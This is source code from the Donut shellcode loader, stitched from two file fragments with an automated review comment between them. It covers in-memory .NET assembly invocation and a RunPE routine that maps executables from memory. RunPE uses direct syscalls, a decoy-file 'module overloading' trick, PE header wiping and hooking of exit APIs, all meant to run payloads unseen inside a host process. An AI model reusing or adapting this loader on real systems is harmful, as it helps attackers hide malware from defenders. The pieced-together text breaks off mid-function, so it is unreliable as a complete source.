250 ansi2unicode(inst, mod->method, buf);
251 method = inst->api.SysAllocString(buf);
252 DPRINT("Method: SysAllocString(\"%ws\")", buf);
253
254 if(method != NULL) {
255 DPRINT("Assembly::GetType_2");
256 hr = pa->as->lpVtbl->GetType_2(pa->as, cls, &pa->type);
257
258 if(SUCCEEDED(hr)) {
259 sav = NULL;
260 DPRINT("Parameters: %s", mod->args);
261
262 if(mod->args[0] != 0) {
263 ansi2unicode(inst, mod->args, buf);
264 argv = inst->api.CommandLineToArgvW(buf, &argc);
265 DPRINT("SafeArrayCreateVector(%li argument(s))", argc);
266
267 sav = inst->api.SafeArrayCreateVector(VT_VARIANT, 0, argc);
268
269 if(sav != NULL) {
270 for(i=0; i<argc; i++) {
271 DPRINT("Adding \"%ws\" as argument %i", argv[i], (i+1));
272
273 V_BSTR(&arg) = inst->api.SysAllocString(argv[i]);
274 V_VT(&arg) = VT_BSTR;
275
276 hr = inst->api.SafeArrayPutElement(sav, &i, &arg);
277
278 if(FAILED(hr)) {
279 DPRINT("SafeArrayPutElement failed.");
280 inst->api.SafeArrayDestroy(sav);
281 sav = NULL;
282 }
283 }
284 }
285 }
286 if(SUCCEEDED(hr)) {
287 DPRINT("Calling Type::InvokeMember_3");
288
289 hr = pa->type->lpVtbl->InvokeMember_3(
290 pa->type,
291 method, // name of method
292 BindingFlags_InvokeMethod |
293 BindingFlags_Static |
294 BindingFlags_Public,
295 NULL,
296 v1, // empty VARIANT
297 sav, // arguments to method
298 &ret); // return code from method
299
300 DPRINT("Type::InvokeMember_3 : %08lx : %s",
301 hr, SUCCEEDED(hr) ? "Success" : "Failed");
302
303 if(sav != NULL) {
304 inst->api.SafeArrayDestroy(sav);
305 }
306 }
307 }
308 inst->api.SysFreeString(method);
309 }
310 inst->api.SysFreeString(cls);
311 }
312 return TRUE;
313 }
314
315 VOID FreeAssembly(PDONUT_INSTANCE inst, PDONUT_ASSEMBLY pa) {
316 HRESULT hr;
317
318 if(pa->type != NULL) {
319 DPRINT("Type::Release");
320 hr = pa->type->lpVtbl->Release(pa->type);
321 pa->type = NULL;
322 DPRINT("HRESULT : %08lX", hr);
323 }
324
325 if(pa->mi != NULL) {
326 DPRINT("MethodInfo::Release");
327 hr = pa->mi->lpVtbl->Release(pa->mi);
328 pa->mi = NULL;
329 DPRINT("HRESULT : %08lX", hr);
330 }
331
332 if(pa->as != NULL) {
333 DPRINT("Assembly::Release");
334 hr = pa->as->lpVtbl->Release(pa->as);
335 pa->as = NULL;
336 DPRINT("HRESULT : %08lX", hr);
337 }
338
339 if(pa->icrh != NULL) {
340 DPRINT("ICorRuntimeHost::UnloadDomain");
341 hr = pa->icrh->lpVtbl->UnloadDomain(pa->icrh, (IUnknown*)pa->ad);
342 DPRINT("HRESULT : %08lX", hr);
343
344 DPRINT("ICorRuntimeHost::Stop");
345 hr = pa->icrh->lpVtbl->Stop(pa->icrh);
346 DPRINT("HRESULT : %08lX", hr);
347
348 DPRINT("ICorRuntimeHost::Release");
349 hr = pa->icrh->lpVtbl->Release(pa->icrh);
350 pa->icrh = NULL;
351 DPRINT("HRESULT : %08lX", hr);
352 }
353
354 if(pa->ad != NULL) {
355 DPRINT("AppDomain::Release");
356 hr = pa->ad->lpVtbl->Release(pa->ad);
357 pa->ad = NULL;
358 DPRINT("HRESULT : %08lX", hr);
359 }
360
361 if(pa->iu != NULL) {
362 DPRINT("IUnknown::Release");
363 hr = pa->iu->lpVtbl->Release(pa->iu);
364 pa->iu = NULL;
365 DPRINT("HRESULT : %08lX", hr);
366 }
367
368 if(pa->icri != NULL) {
369 DPRINT("ICLRRuntimeInfo::Release");
370 hr = pa->icri->lpVtbl->Release(pa->icri);
371 pa->icri = NULL;
372 DPRINT("HRESULT : %08lX", hr);
373 }
374
375 if(pa->icmh != NULL) {
376 DPRINT("ICLRMetaHost::Release");
377 hr = pa->icmh->lpVtbl->Release(pa->icmh);
378 pa->icmh = NULL;
379 DPRINT("HRESULT : %08lX", hr);
380 }
381 }
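Review bot: `RunAssembly` ends with `return TRUE;` on every path except a failed `SysAllocString` for `cls`, so a failing `EntryPoint`, `GetType_2`, `Invoke_3` or `InvokeMember_3` call is reported to the caller as success. Declaring `HRESULT hr = E_FAIL;` and ending with `return SUCCEEDED(hr);` would make the result follow the last HRESULT; the caller is outside this section, so confirm it does not depend on the current value. In the same function the `argv` array returned by `CommandLineToArgvW` is used without a NULL check and is not released on either branch. In `LoadAssembly`, when `IsLoadable` succeeds with `loadable` FALSE, `hr` stays a success code and `pa->icrh->lpVtbl->Start` is reached although this function never assigned `pa->icrh`; returning FALSE at that point would fail closed.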
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifdef _WIN64
32 #define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
33 #else
34 #define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
35 #endif
36
37 typedef struct _IMAGE_RELOC {
38 WORD offset :12;
39 WORD type :4;
40 } IMAGE_RELOC, *PIMAGE_RELOC;
41
42 typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
43 typedef VOID (WINAPI *Start_t)(PPEB);
44 typedef VOID (WINAPI *DllParam_t)(PVOID);
45 typedef VOID (WINAPI *DllVoid_t)(VOID);
46
47 // for setting the command line...
48 typedef CHAR** (WINAPI *p_acmdln_t)(VOID);
49 typedef WCHAR** (WINAPI *p_wcmdln_t)(VOID);
50
51 BOOL SetCommandLineW(PDONUT_INSTANCE inst, PCWSTR NewCommandLine);
52 BOOL IsExitAPI(PDONUT_INSTANCE inst, PCHAR name);
53
54 // In-Memory execution of unmanaged DLL file. YMMV with EXE files requiring subsystem..
55 VOID RunPE(PDONUT_INSTANCE inst, PDONUT_MODULE mod) {
56 PIMAGE_DOS_HEADER dos, doshost;
57 PIMAGE_NT_HEADERS nt, nthost;
58 PIMAGE_SECTION_HEADER sh;
59 PIMAGE_SECTION_HEADER shcp = NULL;
60 PIMAGE_THUNK_DATA oft, ft;
61 PIMAGE_IMPORT_BY_NAME ibn;
62 PIMAGE_IMPORT_DESCRIPTOR imp;
63 PIMAGE_DELAYLOAD_DESCRIPTOR del;
64 PIMAGE_EXPORT_DIRECTORY exp;
65 PIMAGE_TLS_DIRECTORY tls;
66 PIMAGE_TLS_CALLBACK *callbacks;
67 PIMAGE_RELOC list;
68 PIMAGE_BASE_RELOCATION ibr;
69 IMAGE_NT_HEADERS ntc;
70 DWORD rva, size;
71 PDWORD adr;
72 PDWORD sym;
73 PWORD ord;
74 PBYTE ofs;
75 PCHAR str, name;
76 HMODULE dll;
77 ULONG_PTR ptr;
78 DllMain_t DllMain; // DLL
79 Start_t Start; // EXE
80 DllParam_t DllParam = NULL; // DLL function accepting one string parameter
81 DllVoid_t DllVoid = NULL; // DLL function that accepts no parametersd
82 LPVOID base, host;
83 DWORD i, cnt;
84 HANDLE hThread;
85 WCHAR buf[DONUT_MAX_NAME+1];
86 PVOID baseAddress;
87 SIZE_T numBytes;
88 DWORD newprot, oldprot;
89 NTSTATUS status;
90 HANDLE hSection;
91 LARGE_INTEGER liSectionSize;
92 PVOID cs = NULL;
93 SIZE_T viewSize = 0;
94 PVOID ba;
95 SIZE_T rs;
96 CLIENT_ID cid;
97 BOOL has_reloc;
98 PSYSCALL_LIST syscall_list;
99
100 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
101
102 base = mod->data;
103 dos = (PIMAGE_DOS_HEADER)base;
104 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
105
106 // before doing anything. check compatibility between exe/dll and host process.
107 host = inst->api.GetModuleHandle(NULL);
108 doshost = (PIMAGE_DOS_HEADER)host;
109 nthost = RVA2VA(PIMAGE_NT_HEADERS, host, doshost->e_lfanew);
110
111 if(nt->FileHeader.Machine != nthost->FileHeader.Machine) {
112 DPRINT("Host process %08lx and file %08lx are not compatible...cannot load.",
113 nthost->FileHeader.Machine, nt->FileHeader.Machine);
114 return;
115 }
116
117 DPRINT("Allocating %" PRIi32 " (0x%" PRIx32 ") bytes of RWX memory for file",
118 nt->OptionalHeader.SizeOfImage, nt->OptionalHeader.SizeOfImage);
119
120 liSectionSize.QuadPart = nt->OptionalHeader.SizeOfImage;
121
122 // check if the binary has relocation information
123 size = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
124 has_reloc = size == 0? FALSE : TRUE;
125 if (!has_reloc)
126 {
127 DPRINT("No relocation information present, setting the base to: 0x%p", (PVOID)nt->OptionalHeader.ImageBase);
128 cs = (PVOID)nt->OptionalHeader.ImageBase;
129 }
130
131 DPRINT("Creating section to store PE.");
132 if (inst->decoy[0] == 0) {
133 status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, &liSectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL, syscall_list);
134 DPRINT("NTSTATUS: 0x%lx", status);
135 if(!NT_SUCCESS(status)) return;
136 }
137 else {
138 DPRINT("Decoy file path: %ls", inst->decoy);
139 // implement module overloading by creating a MEM_IMAGE section backed by the decoy file
140 HANDLE hDecoy;
141 OBJECT_ATTRIBUTES obj_attr;
142 IO_STATUS_BLOCK status_block;
143 UNICODE_STRING path;
144 inst->api.RtlInitUnicodeString(&path, (wchar_t*)inst->decoy);
145 // init the object attributes
146 InitializeObjectAttributes(
147 &obj_attr,
148 &path,
149 OBJ_CASE_INSENSITIVE,
150 NULL,
151 NULL
152 );
153 status = NtCreateFile(&hDecoy, GENERIC_READ, &obj_attr, &status_block, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, FILE_NON_DIRECTORY_FILE, NULL, 0, syscall_list);
154
155 if (!NT_SUCCESS(status) || hDecoy == INVALID_HANDLE_VALUE || hDecoy == 0) {
156 DPRINT("Error opening decoy file: %d", inst->api.GetLastError());
157 return;
158 }
159 DPRINT("File handle: %p", hDecoy);
160
161 status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, NULL, PAGE_READONLY, SEC_IMAGE, hDecoy, syscall_list);
162
163 NtClose(hDecoy, syscall_list);
164
165 DPRINT("NTSTATUS: 0x%lx", status);
166 if(!NT_SUCCESS(status)) return;
167 }
168
169 DPRINT("Mapping local view of section to store PE.");
170 status = NtMapViewOfSection(hSection, NtCurrentProcess(), &cs, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_READWRITE, syscall_list);
171 DPRINT("NTSTATUS: 0x%lx", status);
172 if(!NT_SUCCESS(status)) return;
173
174 if(cs == NULL) return;
175
176 //system("pause");
177
178 // if module overloading, set everything to RW because they will start out otherwise
179 if (inst->decoy[0] != 0) {
180 ba = cs;
181 rs = viewSize;
182 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_READWRITE, &oldprot, syscall_list);
183 DPRINT("NTSTATUS: 0x%lx", status);
184 if(!NT_SUCCESS(status)) return;
185 }
186
187 DPRINT("Copying Headers");
188 Memcpy(cs, base, nt->OptionalHeader.SizeOfHeaders);
189
190 DPRINT("Copying each section to memory %p", cs);
191 sh = IMAGE_FIRST_SECTION(nt);
192
193 for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
194 Memcpy((PBYTE)cs + sh[i].VirtualAddress,
195 (PBYTE)base + sh[i].PointerToRawData,
196 sh[i].SizeOfRawData);
197 }
198
199 ofs = (PBYTE)cs - nt->OptionalHeader.ImageBase;
200
201 if (has_reloc && ofs != 0) {
202 DPRINT("Applying Relocations");
203
204 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
205 ibr = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
206
207 while ((PBYTE)ibr < ((PBYTE)cs + rva + size) && ibr->SizeOfBlock != 0) {
208 list = (PIMAGE_RELOC)(ibr + 1);
209
210 while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
211 // check that the RVA is within the boundaries of the PE
212 if (ibr->VirtualAddress + list->offset < nt->OptionalHeader.SizeOfImage) {
213 PULONG_PTR address = (PULONG_PTR)((PBYTE)cs + ibr->VirtualAddress + list->offset);
214 if (list->type == IMAGE_REL_BASED_DIR64) {
215 *address += (ULONG_PTR)ofs;
216 } else if (list->type == IMAGE_REL_BASED_HIGHLOW) {
217 *address += (DWORD)(ULONG_PTR)ofs;
218 } else if (list->type == IMAGE_REL_BASED_HIGH) {
219 *address += HIWORD(ofs);
220 } else if (list->type == IMAGE_REL_BASED_LOW) {
221 *address += LOWORD(ofs);
222 } else if (list->type != IMAGE_REL_BASED_ABSOLUTE) {
223 DPRINT("ERROR: Unrecognized Relocation type %08lx.", list->type);
224 goto pe_cleanup;
225 }
226 }
227 list++;
228 }
229 ibr = (PIMAGE_BASE_RELOCATION)list;
230 }
231 }
232
233 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
234
235 if(rva != 0) {
236 DPRINT("Processing the Import Table");
237
238 imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
239
240 // For each DLL
241 for (;imp->Name!=0; imp++) {
242 name = RVA2VA(PCHAR, cs, imp->Name);
243
244 dll = xGetLibAddress(inst, name);
245
246 // Resolve the API for this library
247 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
248 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
249
250 // For each API
251 for (;; oft++, ft++) {
252 // No API left?
253 if (oft->u1.AddressOfData == 0) break;
254
255 // Resolve by ordinal?
256 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
257 ft->u1.Function = (ULONG_PTR)xGetProcAddress(inst, dll, NULL, oft->u1.Ordinal);
258 } else {
259 // Resolve by name
260 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
261
262 // run entrypoint as thread?
263 if(mod->thread != 0) {
264 // if this is an exit-related API, replace it with RtlExitUserThread
265 if(IsExitAPI(inst, ibn->Name)) {
266 DPRINT("Replacing %s!%s with ntdll!RtlExitUserThread", name, ibn->Name);
267 ft->u1.Function = (ULONG_PTR)inst->api.RtlExitUserThread;
268 continue;
269 }
270 }
271 ft->u1.Function = (ULONG_PTR)xGetProcAddress(inst, dll, ibn->Name, 0);
272 }
273 }
274 }
275 }
276
277 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress;
278
279 if(rva != 0) {
280 DPRINT("Processing Delayed Import Table");
281
282 del = RVA2VA(PIMAGE_DELAYLOAD_DESCRIPTOR, cs, rva);
283
284 // For each DLL
285 for (;del->DllNameRVA != 0; del++) {
286 name = RVA2VA(PCHAR, cs, del->DllNameRVA);
287
288 dll = xGetLibAddress(inst, name);
289
290 if(dll == NULL) continue;
291
292 // Resolve the API for this library
293 oft = RVA2VA(PIMAGE_THUNK_DATA, cs, del->ImportNameTableRVA);
294 ft = RVA2VA(PIMAGE_THUNK_DATA, cs, del->ImportAddressTableRVA);
295
296 // For each API
297 for (;; oft++, ft++) {
298 // No API left?
299 if (oft->u1.AddressOfData == 0) break;
300
301 // Resolve by ordinal?
302 if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
303 ft->u1.Function = (ULONG_PTR)xGetProcAddress(inst, dll, NULL, oft->u1.Ordinal);
304 } else {
305 // Resolve by name
306 ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
307 ft->u1.Function = (ULONG_PTR)xGetProcAddress(inst, dll, ibn->Name, 0);
308 }
309 }
310 }
311 }
312
313 Start = RVA2VA(Start_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
314
315 // copy relevant headers before they are wiped
316 ntc = *nt;
317
318 shcp = NULL;
319 rs = ntc.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER);
320 status = NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&shcp, 0, &rs, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, syscall_list);
321 DPRINT("NTSTATUS: 0x%lx", status);
322 if (!NT_SUCCESS(status)) return;
323
324 Memcpy(shcp, sh, ntc.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER));
325
326 if(inst->headers == 1)
327 {
328 // if no decoy is specified, just wipe the headers
329 if (inst->decoy[0] == 0)
330 {
331 DPRINT("Wiping Headers from memory");
332 Memset(cs, 0, nt->OptionalHeader.SizeOfHeaders);
333 Memset(base, 0, nt->OptionalHeader.SizeOfHeaders);
334 }
335 else {
336 DPRINT("Overwriting PE headers with the decoy module's.");
337 Memcpy(base, cs, nt->OptionalHeader.SizeOfHeaders);
338 }
339 }
340
341 if (inst->decoy[0] == 0) {
342 DPRINT("Ummapping temporary local view of section to persist changes.");
343 status = NtUnmapViewOfSection(NtCurrentProcess(), cs, syscall_list);
344 DPRINT("NTSTATUS: 0x%lx", status);
345 if(!NT_SUCCESS(status)) return;
346
347 // if no reloc information is present, make sure we use the preferred address
348 if (has_reloc)
349 cs = NULL;
350 viewSize = 0;
351
352 DPRINT("Mapping writecopy local view of section to execute PE.");
353 status = NtMapViewOfSection(hSection, NtCurrentProcess(), &cs, 0, 0, NULL, &viewSize, ViewUnmap, 0, PAGE_EXECUTE_WRITECOPY, syscall_list);
354 DPRINT("NTSTATUS: 0x%lx", status);
355 if(!NT_SUCCESS(status)) return;
356 }
357
358 // start everything out as WC
359 // this is because some sections are padded and you can end up with extra RWX memory if you don't pre-mark the padding as WC
360 DPRINT("Pre-marking module as WC to avoid padding between PE sections staying RWX.")
361 status = NtProtectVirtualMemory(NtCurrentProcess(), &cs, &viewSize, PAGE_WRITECOPY, &oldprot, syscall_list);
362 DPRINT("NTSTATUS: 0x%lx", status);
363 if(!NT_SUCCESS(status)) return;
364
365 DPRINT("Setting permissions for each PE section");
366 // done with binary manipulation, mark section permissions appropriately
367 for (i = 0; i < ntc.FileHeader.NumberOfSections; i++)
368 {
369 BOOL isRead = (shcp[i].Characteristics & IMAGE_SCN_MEM_READ) ? TRUE : FALSE;
370 BOOL isWrite = (shcp[i].Characteristics & IMAGE_SCN_MEM_WRITE) ? TRUE : FALSE;
371 BOOL isExecute = (shcp[i].Characteristics & IMAGE_SCN_MEM_EXECUTE) ? TRUE : FALSE;
372
373 if (isWrite && isExecute)
374 newprot = PAGE_EXECUTE_WRITECOPY;
375 else if (isRead && isExecute)
376 newprot = PAGE_EXECUTE_READ;
377 else if (isRead && isWrite && !isExecute)
378 {
379 if (inst->decoy[0] == 0)
380 newprot = PAGE_WRITECOPY; // must use WC because RW is incompatible with permissions of initial view (WCX)
381 else
382 newprot = PAGE_READWRITE;
383 }
384 else if (!isRead && !isWrite && isExecute)
385 newprot = PAGE_EXECUTE;
386 else if (isRead && !isWrite && !isExecute)
387 newprot = PAGE_READONLY;
388 else if (!isRead && !isWrite && !isExecute)
389 newprot = PAGE_NOACCESS;
390 else if (!isRead && isWrite && !isExecute)
391 newprot = PAGE_WRITECOPY;
392
393 if (shcp[i].Characteristics & IMAGE_SCN_MEM_NOT_CACHED) {
394 newprot |= PAGE_NOCACHE;
395 }
396
397 baseAddress = (PBYTE)cs + shcp[i].VirtualAddress;
398 if (i < (ntc.FileHeader.NumberOfSections - 1))
399 numBytes = ((PBYTE)cs + shcp[i+1].VirtualAddress) - ((PBYTE)cs + shcp[i].VirtualAddress);
400 else
401 numBytes = shcp[i].SizeOfRawData;
402
403 oldprot = 0;
404
405 DPRINT("Section offset: 0x%X", shcp[i].VirtualAddress);
406 DPRINT("Section absolute address: 0x%p", baseAddress);
407 DPRINT("Section size: 0x%lX", numBytes);
408 DPRINT("Section protections: 0x%X", newprot);
409
410 status = NtProtectVirtualMemory(NtCurrentProcess(), &baseAddress, &numBytes, newprot, &oldprot, syscall_list);
411 DPRINT("NTSTATUS: 0x%lx", status);
412 if (!NT_SUCCESS(status)) return;
413 }
414
415 // declare variables and set permissions of module header
416 DPRINT("Setting permissions of module headers to READONLY (%d bytes)", ntc.OptionalHeader.BaseOfCode);
417 oldprot = 0;
418 numBytes = ntc.OptionalHeader.BaseOfCode;
419 status = NtProtectVirtualMemory(NtCurrentProcess(), &cs, &numBytes, PAGE_READONLY, &oldprot, syscall_list);
420 DPRINT("NTSTATUS: 0x%lx", status);
421 if (!NT_SUCCESS(status)) return;
422
423 DPRINT("Flushing instructionCache");
424 status = NtFlushInstructionCache(NtCurrentProcess(), NULL, 0, syscall_list);
425 DPRINT("NTSTATUS: 0x%lx", status);
426 if (!NT_SUCCESS(status)) return;
427
428 /**
429 Execute TLS callbacks. These are only called when the process starts, not when a thread begins, ends
430 or when the process ends. TLS is not fully supported.
431 */
432 rva = ntc.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress;
433
434 if(rva != 0) {
435 DPRINT("Processing TLS directory");
436
437 tls = RVA2VA(PIMAGE_TLS_DIRECTORY, cs, rva);
438
439 // address of callbacks is absolute. requires relocation information
440 callbacks = (PIMAGE_TLS_CALLBACK*)tls->AddressOfCallBacks;
441 DPRINT("AddressOfCallBacks : %p", callbacks);
442
443 // DebugBreak();
444
445 if(callbacks) {
446 while(*callbacks != NULL) {
447 // call function
448 DPRINT("Calling 0x%p", *callbacks);
449 (*callbacks)((LPVOID)cs, DLL_PROCESS_ATTACH, NULL);
450 callbacks++;
451 }
452 }
453 }
454
455 //system("pause");
456
457 if(mod->type == DONUT_MODULE_DLL) {
458 DPRINT("Executing entrypoint of DLL\n\n");
459 DllMain = RVA2VA(DllMain_t, cs, ntc.OptionalHeader.AddressOfEntryPoint);
460 DllMain(cs, DLL_PROCESS_ATTACH, NULL);
461
462 // call exported api?
463 if(mod->method[0] != 0) {
464 DPRINT("Resolving address of %s", (char*)mod->method);
465
466 rva = ntc.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
467 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, cs, rva);
468
469 if(rva != 0) {
470 cnt = exp->NumberOfNames;
471
472 DPRINT("IMAGE_EXPORT_DIRECTORY.NumberOfNames : %i", cnt);
473
474 if(cnt != 0) {
475 adr = RVA2VA(PDWORD,cs, exp->AddressOfFunctions);
476 sym = RVA2VA(PDWORD,cs, exp->AddressOfNames);
477 ord = RVA2VA(PWORD, cs, exp->AddressOfNameOrdinals);
478
479 DPRINT("IMAGE_EXPORT_DIRECTORY.AddressOfFunctions : 0x%X", *adr);
480 DPRINT("IMAGE_EXPORT_DIRECTORY.AddressOfNames : 0x%X", *sym);
481 DPRINT("IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals : 0x%X", *ord);
482
483 do {
484 str = RVA2VA(PCHAR, cs, sym[cnt-1]);
485 if(!_strcmp(str, mod->method)) {
486 DllParam = RVA2VA(DllParam_t, cs, adr[ord[cnt-1]]);
487 break;
488 }
489 } while (--cnt);
490
491 // resolved okay?
492 if(DllParam != NULL) {
493 DPRINT("Invoking %s", mod->method);
494 // pass parameters/command line to function?
495 if(mod->args[0] != 0) {
496 if(mod->unicode) {
497 ansi2unicode(inst, mod->args, buf);
498 }
499 DllParam((mod->unicode) ? (PVOID)buf : (PVOID)mod->args);
500 } else {
501 // execute DLL function with no parameters
502 DllVoid = (DllVoid_t)DllParam;
503 DllVoid();
504 }
505 } else {
506 DPRINT("Unable to resolve API");
507 goto pe_cleanup;
508 }
509 }
510 }
511 }
512 } else {
513
514 // set the command line
515 if(mod->args[0] != 0) {
516 ansi2unicode(inst, mod->args, buf);
517 DPRINT("Setting command line: %ws", buf);
518 SetCommandLineW(inst, buf);
519 }
520
521 if(mod->thread != 0) {
522 // Create a new thread for this process.
523 // Since we replaced exit-related API with RtlExitUserThread in IAT, once an exit-related API is called, the
524 // thread will simply terminate and return back here. Of course, this doesn't work
525 // if the exit-related API is resolved dynamically.
526 DPRINT("Creating thread for entrypoint of EXE : %p", (PVOID)Start);
527 status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, NtCurrentProcess(), (LPTHREAD_START_ROUTINE)Start, NULL, 0, 0, 0, 0, NULL, syscall_list);
528
529 if(NT_SUCCESS(status)) {
530 // wait for thread to terminate
531 status = NtWaitForSingleObject(hThread, FALSE, NULL, syscall_list);
532 DPRINT("NTSTATUS: 0x%lx", status);
533 if (!NT_SUCCESS(status)) return;
534 DPRINT("Process terminated");
535 }
536 } else {
537 // if ExitProces is called, this will terminate the host process.
538 DPRINT("Executing entrypoint");
539 Start(NtCurrentTeb()->ProcessEnvironmentBlock);
540 }
541 }
542 pe_cleanup:
543 // if memory allocated
544 if(cs != NULL) {
545 // release
546 DPRINT("Releasing memory");
547 rs = 0;
548 status = NtFreeVirtualMemory(NtCurrentProcess(), (PVOID)&shcp, &rs, MEM_RELEASE, syscall_list);
549 DPRINT("NTSTATUS: 0x%lx", status);
550 if (!NT_SUCCESS(status)) return;
551 status = NtUnmapViewOfSection(NtCurrentProcess(), cs, syscall_list);
552 DPRINT("NTSTATUS: 0x%lx", status);
553 if (!NT_SUCCESS(status)) return;
554 NtClose(hSection, syscall_list);
555 }
556 }
557
558 // check each exit-related api with name provided
559 // return TRUE if found, else FALSE
560 BOOL IsExitAPI(PDONUT_INSTANCE inst, PCHAR name) {
561 PCHAR str;
562 CHAR api[128];
563 INT i;
564
565 str = inst->exit_api;
566
567 for(;;) {
568 // store string until null byte or semi-colon encountered
569 for(i=0; str[i] != '\0' && str[i] !=';' && i<128; i++) api[i] = str[i];
570 // nothing stored? end
571 if(i == 0) break;
572 // skip name plus one for separator
573 str += (i + 1);
574 // store null terminator
575 api[i] = '\0';
576 // if equal, return TRUE
577 if(!_strcmp(api, name)) return TRUE;
578 }
579 return FALSE;
580 }
581
582 // returns TRUE if ptr is heap memory
583 BOOL IsHeapPtr(PDONUT_INSTANCE inst, LPVOID ptr) {
584 MEMORY_BASIC_INFORMATION mbi;
585 DWORD res;
586 NTSTATUS status;
587 PSYSCALL_LIST syscall_list;
588
589 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
590
591 if(ptr == NULL) return FALSE;
592
593 // query the pointer
594 status = NtQueryVirtualMemory(NtCurrentProcess(), ptr, MemoryBasicInformation, &mbi, sizeof(mbi), NULL, syscall_list);
595 if (!NT_SUCCESS(status)) return FALSE;
596
597 return ((mbi.State == MEM_COMMIT ) &&
598 (mbi.Type == MEM_PRIVATE ) &&
599 (mbi.Protect == PAGE_READWRITE));
600 }
601
602 // Set the command line for host process.
603 //
604 // This replaces kernelbase!BaseUnicodeCommandLine and kernelbase!BaseAnsiCommandLine
605 // that kernelbase!KernelBaseDllInitialize reads from NtCurrentPeb()->ProcessParameters->CommandLine
606 //
607 // BOOL KernelBaseDllInitialize(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
608 //
609 // Only tested on windows 10, but should work with at least windows 7
610 BOOL SetCommandLineW(PDONUT_INSTANCE inst, PCWSTR CommandLine) {
611 PIMAGE_DOS_HEADER dos;
612 PIMAGE_NT_HEADERS nt;
613 PIMAGE_SECTION_HEADER sh;
614 DWORD i, cnt;
615 PULONG_PTR ds;
616 HMODULE m;
617 ANSI_STRING ansi;
618 PANSI_STRING mbs;
619 PUNICODE_STRING wcs;
620 PPEB peb;
621 PPEB_LDR_DATA ldr;
622 PLDR_DATA_TABLE_ENTRY dte;
623 PRTL_USER_PROCESS_PARAMETERS upp;
624 BOOL bSet = FALSE;
625 CHAR **argv;
626 WCHAR **wargv;
627 p_acmdln_t p_acmdln;
628 p_wcmdln_t p_wcmdln;
629 CHAR sym[128];
630 PCHAR str;
631 INT fptr, atype;
632 PVOID addr, wcmd, acmd;
633
634 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
635 upp = peb->ProcessParameters;
636
637 DPRINT("Obtaining handle for %s", inst->kernelbase);
638 m = inst->api.GetModuleHandle(inst->kernelbase);
639 dos = (PIMAGE_DOS_HEADER)m;
